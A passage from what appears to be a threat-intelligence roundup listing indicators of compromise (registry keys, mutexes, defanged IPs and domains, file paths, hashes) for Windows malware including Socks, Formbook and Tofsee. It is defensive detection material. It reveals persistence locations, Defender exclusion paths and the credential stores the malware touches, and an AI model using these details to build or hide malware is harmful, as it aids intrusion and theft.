\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoTrayItemsDisplay ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: nEwb0Rn ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: n3wb012nAdministrator ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: n210bw3n ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT \nValue Name: AlternateShell ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Shell ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\AEDEBUG \nValue Name: Debugger ` | 25 \n`<HKLM>\\SOFTWARE\\CLASSES\\LNKFILE\\SHELL\\OPEN\\COMMAND ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: RegisteredOrganization ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: RegisteredOwner ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoFileAssociate ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: NoFileAssociate ` | 25 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: DisallowRun ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\DISALLOWRUN \nValue Name: 1 ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\MSCTF.Asm.MutexWinlogon2` | 25 \n`Local\\MSCTF.CtfMonitorInstMutexWinlogon2` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`51[.]141[.]32[.]51` | 24 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`time[.]microsoft[.]akadns[.]net` | 24 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\winevt\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\winlogon.exe` | 24 \n`%SystemRoot%\\nEwb0Rn.exe` | 22 \n`%System32%\\DamageControl.scr` | 22 \n`%System32%\\JawsOfLife.exe` | 22 \n`\\nEwb0Rn.exe` | 22 \n`\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\Empty.pif` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE` | 21 \n`%HOMEPATH%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE` | 21 \n`%System32%\\WishfulThinking.exe` | 21 \n`\\about.htm` | 18 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif` | 2 \n`%SystemRoot%\\msvbvm60.dll` | 2 \n`E:\\Download Administrator.exe` | 2 \n`E:\\MP3[NEW-RELEASE].exe` | 2 \n`E:\\nEwb0Rn\\New Folder.exe` | 2 \n`\\Download Administrator.exe` | 2 \n`\\Friendster Blog.exe` | 2 \n`\\MP3[NEW-RELEASE].exe` | 2 \n`\\Mini Games.exe` | 2 \n`\\StyleXP-WindowsVistaPack.exe` | 2 \n`%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE` | 2 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5 73fcbb6f10cd849bff109dd05cf89d9b612302faed9c382791d6df4d024bc009 7e98f0308fd88e97e4f80b1e2c6845e18186e07d2a27d936bccadad719114334 809f403efb1c7f19a30cfdd62841b898ebfbc1e91626928bb372ad630d8d9b81 81dc5726d4af65258dec6ccf0dda1327fcacb9b950539992fff82859c6645a27 85506de211f0441c3bbf0e98668a7d3d1c2a62aadc07ef82968245644fca4b00 8ef7ee2b458b006e3364f972a744031cb99c9a9d7bb4329b4a41e6d0e1cbb784 96093b99c83298eeb0aa6ac9a9c006f23ad8d8c1818b8a88c62ea1f88fd7d368 9784b14130ecabb2d53ea4226e79f6dca68e9bf31a83cc447a0113464582a5df 99da8c945884ce7e214aba8f0b363532082d660bae2693c098b230701d236b7b 9b4eabfb075dd32ce295b7dab5a0347f7c5f89021c8804cf88152b0be7de1544 9bf0202ddec81f84ad07867e28214decfef7fd5bd1327a6b9482de823d90ff60 9da800449b88fbc076c16d4fa6d42645367e9b0e1c3306ad5f65df77b3348a72 9de658e0f67bdcae688d74907763d87f280086e5c47cc0c2ee545f8cf675a42d a2cbadc9bb11b4174d11407599ae95ee3680054e04105b0ef435628dcc252954 a84944ae92cc5732281c71ffa5b17b68ee362441bc8093da4d59bc0ca5723f74 a86c3e90ba9c53348dde346e5bebf63d8198dafabf82baaf298f5b8c23ff4fa8 b36b7ceef1d16e877580931a8ec5a70462f0513a4d113bcb1e3e198830aa3447 c600cf8b855fefb4e9e1e4d0c1f0d92c58eee1f06d53a88b0d96ecac94e7dbfd c88906c44642322a0ad3fd0207e9873d89d16d15b317c0e51d1fed28138ce210 cba998582b123d210bccb81e49db805736439eba5f4735883d4597e2c5895f85 d296651dfc3d2d3f31115e48e815449bf71d06a64318462c1bd2f0e299d6a63f d38e3cfe3f57ddea4f4b8966b4b51812af1ac688849a8bbee086ec905f0406d1 d3a23ff88633039f39ea421a2d197e3b6d9bb26ad6e5500dfb559b126884fbac d5456a558e240fbe2e116155e4a04c8c038550ab4c2c4103d9e49da2a8ba495f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-6ZWdcT_r_4k/XU3PWRqgACI/AAAAAAAACTY/Npr3WJrX8Lcl15wk-WT7x1jPZroJ3YqygCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-pl-WqHJO3Ys/XU3PaLukIuI/AAAAAAAACTc/ivffFBlFSQIRzQt5PrLMGVfYC8jBWiPVQCLcBGAs/s1600/642e0acdbece0f1e99604f63488e2d0ae4845080adba80ecfc55cbc95db05bc5_tg.png>)\n\n \n\n\n \n\n\n### Win.Worm.Socks-7102087-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 11 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: ImagePath ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntuser ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: autoload ` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]100[.]26[.]251` | 11 \n`23[.]20[.]239[.]12` | 11 \n`104[.]25[.]37[.]108` | 8 \n`104[.]25[.]38[.]108` | 3 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]hugedomains[.]com` | 11 \n`fewfwe[.]com` | 11 \n`fewfwe[.]net` | 11 \n`static[.]HugeDomains[.]com` | 7 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\cftmon.exe` | 11 \n`%SystemRoot%\\SysWOW64\\drivers\\spools.exe` | 11 \n \n#### File Hashes\n\n` 16c60b7975280008e5491cae5e71fa48671be5c97010488faf63956c6552c628 44f3b28713682be10e02bdf52a99290b733931bac2e8c0b4102e4f458b1284bd 5943ca2e22ce53fcc9b7caabfca8d8cf721ccbd4f536833b10a370303fcaf505 7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73 8dfb856841b2f70e2bffb74f26225dcc42d65d3fa6250767397ac30bf21823f5 a52c2e6216c1685d35385419c9c8cd854ea70490f923bbc3eaff92df26bafbc6 a73604e5b2456cc803dae1b79d91db32ce2535562bdc73eb762394540c79d7af b9510728d8c9d3807e26ba9286f3ab6890e335a197b377201b939230a3d6d69b c8a3ac87c01529800bd6461d94702428322c7a3aed93ed676f0a55d3d56addd9 e4c7f241397b5a46c3081214f1eb67b51bd6d5dd20cd984db4f5ac164f260bf1 fe80f9c59fc294d3a6fe8d973ea687f92daf1a6988e13a26bcec20f34f44ab25 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZHnATHYXbBo/XU3PsCQ8GnI/AAAAAAAACTw/C0tZjMLq7zQu-pw45c3wuZxIa_DJJlf-QCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-U_ICUIL9cmQ/XU3P66OFj2I/AAAAAAAACT0/h7jOKg0cCk0X2MbaEILOX8wF4sD5VafcQCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Formbook-7102043-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\INTELLIFORMS\\STORAGE2 ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MOZILLA\\MOZILLA FIREFOX ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MOZILLA\\MOZILLA FIREFOX\\20.0.1 (EN-US)\\MAIN ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000001 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000002 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000003 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\0A0D020000000000C000000000000046 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\13DBB0C8AA05101A9BB000AA002FC45A ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\33FD244257221B4AA4A1D9E6CACF8474 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\3517490D76624C419A828607E2A54604 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\4C8F4917D8AB2943A2B2D4227B0585BF ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\5309EDC19DC6C14CBAD5BA06BDBDABD9 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\82FA2A40D311B5469A626349C16CE09B ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\8503020000000000C000000000000046 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9207F3E0A3B11019908B08002B2A56C2 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9E71065376EE7F459F30EA2534981B83 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\A88F7DCF2E30234E8288283D75A65EFB ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\C02EBC5353D9CD11975200AA004AE40E ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\D33FC3B19A738142B2FC0C56BD56AD8C ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DDB0922FC50B8D42BE5A821EDE840761 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DF18513432D1694F96E6423201804111 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\ECD15244C3E90A4FBD0588A41AB27C55 ` | 8 \nMutexes | Occurrences \n---|--- \n`8-3503835SZBFHHZ` | 11 \n`551NC37UWE1041Fz` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`213[.]171[.]195[.]105` | 2 \n`213[.]186[.]33[.]5` | 1 \n`74[.]220[.]215[.]74` | 1 \n`154[.]91[.]238[.]82` | 1 \n`208[.]91[.]197[.]39` | 1 \n`47[.]91[.]169[.]15` | 1 \n`103[.]251[.]238[.]111` | 1 \n`185[.]218[.]125[.]67` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]aamyz87[.]info` | 3 \n`www[.]ingenuity[.]degree` | 2 \n`www[.]activeliberal[.]win` | 2 \n`www[.]beautagram[.]com` | 2 \n`gmpg[.]org` | 1 \n`www[.]cyqunli[.]com` | 1 \n`WWW[.]SOJAH[.]STORE` | 1 \n`www[.]qhdljj[.]com` | 1 \n`www[.]tzhmc[.]net` | 1 \n`www[.]yourbostonrefinance[.]com` | 1 \n`www[.]immersive-journey[.]com` | 1 \n`www[.]studiodennis[.]com` | 1 \n`www[.]wanggh[.]com` | 1 \n`www[.]americatourbus[.]info` | 1 \n`www[.]kalayab[.]download` | 1 \n`www[.]shaoerjia[.]com` | 1 \n`www[.]maybrooktaxiandlimo[.]info` | 1 \n`www[.]tipshots[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\subfolder` | 11 \n`%TEMP%\\subfolder\\filename.exe` | 11 \n`%TEMP%\\subfolder\\filename.vbs` | 11 \n`%APPDATA%\\551NC37U` | 8 \n`%APPDATA%\\551NC37U\\551log.ini` | 8 \n`%APPDATA%\\551NC37U\\551logrc.ini` | 8 \n`%APPDATA%\\551NC37U\\551logri.ini` | 8 \n`%APPDATA%\\551NC37U\\551logrv.ini` | 8 \n`%APPDATA%\\551NC37U\\551logim.jpeg` | 7 \n`%ProgramFiles(x86)%\\Amb80q` | 1 \n`%ProgramFiles(x86)%\\Amb80q\\serviceslds.exe` | 1 \n`%TEMP%\\Amb80q` | 1 \n`%TEMP%\\Amb80q\\serviceslds.exe` | 1 \n \n#### File Hashes\n\n` 0d9c018014931c251ac8bf951a99fcb974673e895f27e62fa6ead981b2d7b4a2 152f38878f5a8b19fef76f086f60f9a350bacfb55ced80cdbceb200b88e9c9fa 2908ff55a23aa61c2393df98cd6847f60343f296aeeb7bcc60c510701dcbf84f 2b6f4aad989ddca53c3cb56bbddb52e8577cbb40939f97ef9c7efb60d24a39ae 2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721 6fc83ce9acf100506d039461642290e798f46baaf8034b5f2ead098edc3d9f4c 78663a1055ddd96e74b633b43128c83378787b52f031194ebaeccf69a0222645 c1b420d09459d96aa0bbc12a6b010a6d12b5910ffbd0289fa7a3ed3aebfac40d d27385d640966750e4ead578539a36a62ba0ae5c9083f03865927ef5deac2d8f d7bb858da997925668b1f85b83ba9f01b381a16de1ee6c37d003658cb98c4990 e4baf530d129b0a3a87e5de09ce86efc7c6c532ec91ade78c934d5e8d818938e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-T4Xc5XxJ2PY/XU3QmQJpPJI/AAAAAAAACT8/33Yc9frC4pwvaz88aJ6B3XoWNWbA4AqUwCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IAWh8SPAAL4/XU3Qp2jP04I/AAAAAAAACUA/Cib5bh0DuU4Nu1e3kJm418FBFHAyrPSogCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Tofsee-7101989-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config4 ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 15 \n`69[.]55[.]5[.]250` | 15 \n`46[.]4[.]52[.]109` | 15 \n`176[.]111[.]49[.]43` | 15 \n`85[.]25[.]119[.]25` | 15 \n`144[.]76[.]199[.]2` | 15 \n`144[.]76[.]199[.]43` | 15 \n`43[.]231[.]4[.]7` | 15 \n`192[.]0[.]47[.]59` | 15 \n`74[.]125[.]192[.]26` | 15 \n`168[.]95[.]5[.]117` | 15 \n`98[.]137[.]159[.]25` | 15 \n`188[.]125[.]73[.]87` | 14 \n`172[.]217[.]12[.]228` | 14 \n`213[.]205[.]33[.]62` | 14 \n`212[.]82[.]101[.]46` | 13 \n`67[.]195[.]228[.]106` | 13 \n`168[.]95[.]6[.]59` | 13 \n`74[.]6[.]137[.]65` | 13 \n`96[.]114[.]157[.]80` | 13 \n`213[.]209[.]1[.]129` | 12 \n`66[.]218[.]85[.]139` | 12 \n`213[.]205[.]33[.]61` | 12 \n`67[.]195[.]228[.]110` | 12 \n`209[.]85[.]202[.]26` | 12 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 15 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 15 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 15 \n`mta5[.]am0[.]yahoodns[.]net` | 15 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 15 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 15 \n`whois[.]iana[.]org` | 15 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 15 \n`whois[.]arin[.]net` | 15 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 15 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 15 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 15 \n`honeypus[.]rusladies[.]cn` | 15 \n`marina99[.]ruladies[.]cn` | 15 \n`eur[.]olc[.]protection[.]outlook[.]com` | 14 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`aol[.]com` | 13 \n`msx-smtp-mx1[.]hinet[.]net` | 13 \n`ipinfo[.]io` | 12 \n`smtp-in[.]libero[.]it` | 12 \n`libero[.]it` | 12 \n`tiscali[.]it` | 12 \n`etb-1[.]mail[.]tiscali[.]it` | 12 \n`tiscalinet[.]it` | 12 \n`mx3[.]qq[.]com` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 15 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 15 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 15 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 15 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 14 \n`%TEMP%\\ondzgch.exe` | 1 \n`%TEMP%\\rqgcjfk.exe` | 1 \n`%TEMP%\\baqmtpu.exe` | 1 \n`%TEMP%\\qpfbiej.exe` | 1 \n \n#### File Hashes\n\n` 03014df764784dff0d3c56cccdbfb07ca0c04cdbd302403ebedc466e83e18f6c 0c30a1e0c3e91cbaf62beb5e217b44f5065f7e97c19d0eb181e0d37720be178d 213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5 23dc9f05f6003f3730b5731072eb9754fbf80a353cdbe94704a5e425a18aa0e5 31702562438866f49dddb8c0fc8e6d9b68ec2eb73b142c899479102850de0fdd 398288b17c7ffc8b569ac4c8623cb4e1dc4c97da2a021bfd86182fd23e92735c 5a3fe5af1026e7f6217e91cc4b6d1c888efde908369b1b8a216c6e954c648d3d 5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb 7c73e7cfd0be419b1538309b2a5fb45a2515808fe92492db79e0cbbdce976643 8895dda1641282ea209e8482269cb7c34f2da9843c9d0293fc3d6aec2612e212 8ef82ce7ed1ed7c6ddd446b4a8a7144acac21aab0af0ee82ac764b525ea00b07 b9c035fd6f4d2a6b8d619812b98764885927b80f3a8369e87495f95b2bcbf44d d2f043f4002cdcbd88319a360dc11a0aec1ebae63f37ef9a845beb23779a1151 e42a5b04986cbdc9c13fcb99b2e1e0a2d156e6faaf1369ed71a92220a1347f06 e4c584dd32770439810067fe8607f74a64380fe354725ff4a5d42215b873b1e1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-QK5Wqh41b5o/XU3Q6hoziYI/AAAAAAAACUI/sMvphMDkpkEaIaw_trTCeaGDfHwtf0F9gCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_amp.png>)\n\n \n\n\n#### 